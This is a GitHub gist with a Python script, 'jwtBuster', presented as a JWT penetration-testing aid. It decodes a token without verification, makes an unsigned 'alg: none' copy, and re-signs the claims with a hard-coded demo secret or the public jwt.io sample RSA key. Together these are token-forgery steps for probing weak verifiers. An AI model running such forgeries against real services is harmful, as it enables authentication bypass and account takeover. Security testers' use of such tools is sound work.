@Anon-Exploiter
Last active October 20, 2021 11:05
For pentesting a JWT: fetches its body and type, and signs it with an arbitrary string or PEM file (depending on the type in use). Also returns a `None`-type JWT.
from sys import argv
import json
import jwt
# Demo secret for the HS* branches. It is hard-coded and published with this
# script, so treat it as public; a verifier that accepts tokens signed with it
# is sharing a known secret.
JWTSECRET = "jwtSecretKeyEncryption"
# RSA private key for the RS* branches: the publicly known jwt.io sample key,
# not a secret. (The key body is elided in this listing.)
PRIVATEKEY = """-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----""" # Key taken from jwt.io
# NOTE: "HS128" below does not match the code, which handles HS256/HS384/HS512;
# HS128 is not a registered JWS algorithm (RFC 7518 defines HS256/384/512).
"""
ToDos
- Read some articles and find other ways to encode/encrypt/test the token
ToDos Done
- Print the JWT
- Print the decoded JWT
- Find the Type of Encryption/Encoding being done in the Token
- `Encode` the JWT token with None type
- Find the encoding/encryption mechanism and encrypt the token specific to that
- Encrypt the JWT token with HS128
- Encrypt the JWT token with HS256
- Encrypt the JWT token with RS256
- Encrypt the JWT token with RS512
Member:
- Do try other encryption types' tokens too, don't just use the same type always! (hooman specific)
"""
def printData(heading, data):
    """Print *data* under a ``[#] heading`` banner framed by 30-dash rules.

    Layout: rule, heading line, rule, ``str(data)``, rule, then one blank
    line so consecutive sections stay visually separated on the terminal.

    Args:
        heading: Label shown after the ``[#]`` marker.
        data: Any object; rendered with ``str`` exactly as ``print`` would.
    """
    rule = "-" * 30
    section = [rule, f"[#] {heading}", rule, str(data), rule, ""]
    print("\n".join(section))
def decodeJWT(token):
    """Print and return the token's claims as indented JSON without verifying it.

    ``verify=False`` is the pre-2.0 PyJWT spelling; 2.x dropped that keyword in
    favour of ``options={"verify_signature": False}`` — confirm the installed
    version before relying on this. No signature or claim checks happen here,
    so the returned claims are untrusted input.

    Args:
        token: Compact-serialised JWT string.

    Returns:
        The payload claims as a JSON string (indent 4), exactly as printed.
    """
    claims = jwt.decode(token, verify=False)
    pretty = json.dumps(claims, indent=4)
    printData('Decoded JWT Data', pretty)
    return pretty
def JWTHeader(token):
    """Print the unverified JOSE header and return ``(alg, header)``.

    The ``alg`` value is read straight from the token as presented; nothing
    here checks that a server actually honours that algorithm.

    Args:
        token: Compact-serialised JWT string.

    Returns:
        Tuple of the header's ``alg`` string and the full header dict.

    Raises:
        KeyError: if the header carries no ``alg`` member.
    """
    header = jwt.get_unverified_header(token)
    printData("JWT Header", header)
    alg = header['alg']
    return alg, header
def encodeWithNONE(decodedJWT):
    """Re-encode *decodedJWT* (a JSON string) as an unsigned token and print it.

    ``algorithm=None`` is intended to yield an ``alg: none`` token; a verifier
    that accepts that token is not validating signatures, which is the
    misconfiguration this output is used to detect.

    ``.decode()`` assumes ``jwt.encode`` returns bytes (PyJWT < 2.0); on 2.x it
    already returns ``str`` and this call raises ``AttributeError``.

    Args:
        decodedJWT: Claims as a JSON string (as produced by ``decodeJWT``).
    """
    claims = json.loads(decodedJWT)
    unsigned = jwt.encode(claims, key='', algorithm=None).decode()
    printData("JWT encoded token with type `None`", unsigned)
def jwtEncodingEncryption(algo, body):
    """Re-sign *body* with this module's own key for *algo* and print the result.

    HS* algorithms are signed with ``JWTSECRET`` and RS* algorithms with
    ``PRIVATEKEY`` (the public jwt.io sample key). A verifier that accepts
    the HS* output shares that hard-coded secret; one that accepts the RS*
    output trusts the sample key — both are configuration findings, not
    properties of this code. For any other ``alg`` only a "no module"
    message is printed and *body* is not parsed.

    ``.decode()`` assumes ``jwt.encode`` returns bytes (PyJWT < 2.0).

    Args:
        algo: ``alg`` value taken from the token header.
        body: Claims as a JSON string.
    """
    key_for = {
        'HS256': JWTSECRET,
        'HS384': JWTSECRET,
        'HS512': JWTSECRET,
        'RS256': PRIVATEKEY,
        'RS384': PRIVATEKEY,
        'RS512': PRIVATEKEY,
    }
    if algo in key_for:
        signed = jwt.encode(json.loads(body), key_for[algo], algorithm=algo).decode()
    else:
        signed = "[!] This token doesn't has any module currently, please file a issue against this! :)"
    printData(f"JWT encoded token with type `{algo}`", signed)
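def main():
    """CLI entry point: ``python3 jwtBuster.py <token>``.

    Prints the raw token, its unverified header, its decoded claims, an
    ``alg: none`` re-encoding, and a copy re-signed with this module's key
    for the header's ``alg``.

    Exits with status 2 and a usage line when no token argument is given
    (the original indexed ``argv[1]`` unconditionally and died with
    ``IndexError``).
    """
    if len(argv) < 2:
        print("Usage: python3 jwtBuster.py <token>")
        raise SystemExit(2)
    jwtToken = argv[1]
    printData('JWT Token', jwtToken)
    # JWTHeader returns (alg, header); only alg drives the re-signing step.
    alg, _header = JWTHeader(jwtToken)
    decodedJWT = decodeJWT(jwtToken)
    encodeWithNONE(decodedJWT)
    jwtEncodingEncryption(alg, decodedJWT)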
if __name__ == '__main__':
    # Run only when invoked as a script, so the helpers stay importable.
    main()

Anon-Exploiter commented Jul 23, 2021

What does it do?

  • Print the JWT
  • Print the decoded JWT
  • Find the Type of Encryption/Encoding being done in the Token
  • Encode the JWT token with None type
  • Find the encoding/encryption mechanism and encrypt the token specific to that
  • Encrypt the JWT token with HS128
  • Encrypt the JWT token with HS256
  • Encrypt the JWT token with RS256
  • Encrypt the JWT token with RS512

Run with:

python3 jwtBuster.py "token"
